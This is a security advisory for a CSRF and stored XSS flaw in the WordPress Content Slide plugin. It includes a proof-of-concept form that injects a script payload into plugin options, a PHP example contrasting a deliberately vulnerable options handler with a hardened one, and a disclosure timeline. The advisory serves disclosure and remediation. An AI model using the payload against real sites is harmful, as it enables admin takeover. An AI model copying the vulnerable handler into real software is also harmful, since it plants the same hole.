Advisory:

CSRF and stored XSS in WordPress Content Slide allow an attacker to have full admin privileges

Vulnerability

Last revised:

An attacker able to convince an admin to visit a link of their choosing is able to execute arbitrary JavaScript:

A CSRF vulnerability allows an attacker to change any option in the plugin. The plugin does not escape option values when it writes them into HTML, so the attacker can then use JavaScript to perform almost any action an admin can take (including creating new users, executing arbitrary PHP through the theme editor, or exploiting vulnerabilities in WordPress or other plugins which normally require the user to be authenticated as an admin).

Current state: Reported

CVSS Summary

CVSS base scores for this vulnerability:
  Score:           6.8 (Medium)
  Vector:          Network
  Complexity:      Medium
  Authentication:  None
  Confidentiality: Partial
  Integrity:       Partial
  Availability:    Partial
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

While logged in to a site that has the plugin enabled, open a page containing the following form and click the submit button (in a real attack the form could be made to auto-submit):

<form action="http://localhost/wp-admin/admin.php?page=content-slide/content_slide.php" method="POST">
  <input type="text" name="wpcs_options[no_of_custom_images]" value="1">
  <input type="text" name="wpcs_options[slide_image1]" value="&quot;>&lt;script>alert(1)&lt;/script>">
  <input type="submit">
</form>

If using a browser without reflected XSS mitigation (e.g. Chrome) the admin user will see “1” in an alert box, otherwise a refresh of the page is required before the JavaScript is executed.
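The two defects behind this advisory (an options save handler that accepts any POST without a CSRF token, and output that is not escaped) are shown below next to their fix. This is an added illustration written for this advisory, not the Content Slide plugin's own code; the option and field names come from the proof of concept above, while the function names wpcs_vulnerable_page and wpcs_hardened_page are hypothetical.

```php
<?php
// Added illustration, not the Content Slide plugin's own code: a minimal
// WordPress options page showing the two defects the advisory describes
// (no CSRF token check on save, no escaping on output) next to the fix.
// The names wpcs_options, no_of_custom_images and slide_image1 are taken
// from the advisory's proof of concept; the function names are hypothetical.

// --- Vulnerable pattern: any POST is trusted and the value is echoed raw ---
function wpcs_vulnerable_page() {
    if ( isset( $_POST['wpcs_options'] ) ) {
        // No nonce check: a cross-site form submission made by a logged-in
        // admin's browser is accepted exactly like a legitimate save.
        update_option( 'wpcs_options', $_POST['wpcs_options'] );
    }
    $opts = get_option( 'wpcs_options', array() );
    // No escaping: a stored value of  "><script>alert(1)</script>  closes
    // the attribute and runs as script for every admin who opens this page.
    echo '<input type="text" name="wpcs_options[slide_image1]" value="'
        . $opts['slide_image1'] . '">';
}

// --- Hardened pattern: capability check, nonce check, sanitise, escape ---
function wpcs_hardened_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    if ( isset( $_POST['wpcs_options'] ) ) {
        // Dies unless a valid nonce tied to this action and the current
        // user was submitted with the form, so a cross-site form fails here.
        check_admin_referer( 'wpcs_save_options' );
        $raw   = (array) $_POST['wpcs_options'];
        $clean = array(
            'no_of_custom_images' => absint( $raw['no_of_custom_images'] ?? 0 ),
            'slide_image1'        => esc_url_raw( $raw['slide_image1'] ?? '' ),
        );
        update_option( 'wpcs_options', $clean );
    }
    $opts = get_option( 'wpcs_options', array() );
    echo '<form method="post">';
    // Emits the hidden _wpnonce field that check_admin_referer() verifies.
    wp_nonce_field( 'wpcs_save_options' );
    // Escape on output regardless of what is stored, so previously saved
    // or imported option values cannot break out of the attribute either.
    echo '<input type="text" name="wpcs_options[slide_image1]" value="'
        . esc_attr( $opts['slide_image1'] ?? '' ) . '">';
    echo '<input type="submit" value="Save"></form>';
}
```

With the hardened handler, the proof-of-concept form above is rejected by check_admin_referer() before update_option() runs, and even an already-stored payload renders as inert text because of esc_attr().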

Advisory timeline

  • 2014-10-08: Discovered
  • 2014-12-16: Reported to vendor via email form at http://www.snilesh.com/contact-me/
  • 2014-12-16: Requested CVE
  • 2015-01-07: Vendor responded
  • 2015-01-09: Vendor chased
  • 2015-04-09: Vendor had given assurances that a fix would be available, and was given multiple extensions to do so, but by this point they had stopped responding. Emailed plugins@wordpress.org requesting a takedown.
  • 2015-04-16: Confirmed that the plugin is no longer on the directory. Published.

Mitigation/further actions

Disable the plugin until a new version is released that fixes this bug.

At the time of publishing no fix is available and the plugin has been removed from the plugin directory.